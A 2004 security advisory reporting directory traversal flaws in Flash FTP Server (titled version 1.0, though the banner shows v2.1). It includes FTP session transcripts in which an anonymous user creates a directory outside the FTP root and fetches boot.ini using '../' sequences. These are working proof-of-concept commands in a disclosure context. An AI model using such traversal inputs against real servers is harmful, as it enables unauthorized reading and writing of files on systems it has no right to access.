Flash Ftp server 1.0 Directory traversal

Release Date:
January 1, 2004


Systems Affected:
Flash FTP Server is a powerful, flexible, and easy-to-set-up FTP server for all Windows
platforms. Some bugs were found that will allow a malicious user to write and read anywhere
on the disk.

Demonstration:
--------------
[1]

220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.

[2]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini


Suggestions:
Allow only trusted users access to systems. Log creation of files/directories on systems 
to identify malicious users.

Patch:
Not yet available

credit:
dr_insane
http://members.lycos.co.uk/r34ct/